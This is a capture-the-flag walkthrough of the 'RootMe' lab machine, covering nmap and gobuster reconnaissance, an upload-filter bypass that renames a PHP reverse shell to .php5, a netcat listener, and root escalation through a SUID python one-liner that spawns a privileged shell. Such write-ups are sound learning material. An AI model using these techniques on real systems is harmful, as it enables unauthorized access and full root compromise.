RootMe

Penetration Testing Methodology

Reconnaissance

  • nmap

Enumeration

  • Directory enumeration using gobuster

Exploitation *

Privilege Escalation

  • /usr/bin/python

Capturing the flag

  • user.txt

  • root.txt

Walkthrough

nmap -sC -sV 10.10.231.227
image

From the nmap scanning. I found that 2 port open. Which is

  • 22 (ssh)

  • 80 (http)

I browse the given IP address.

image

But, there is nothing interesting. So, I decide to enumerate the directory. By using gobuster.

gobuster dir -u 10.10.231.227 -w /root/List/directory-list-2.3-medium.txt=

list all directory or file

image

Open the directory (http://10.10.231.227/p****/)

Seems like we can upload a file.

Upload reverseshell and run a listener

nc -nlvp 1234
image

Cannot upload php file. Lets try change to php5 or php4.

image

Okay success.

image

Click and we will get into system.

find / -name user.txt 2>/dev/null

Privilege Escalation

/usr/bin/python

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

CONGRATULATIONS!!

This was a fun machine. Very basic yet fun to root. Good for beginner.

Thank you for reading. :)

By AdaniKamal

PreviousAnonforceNextstealthcopter ctf primer1

Last updated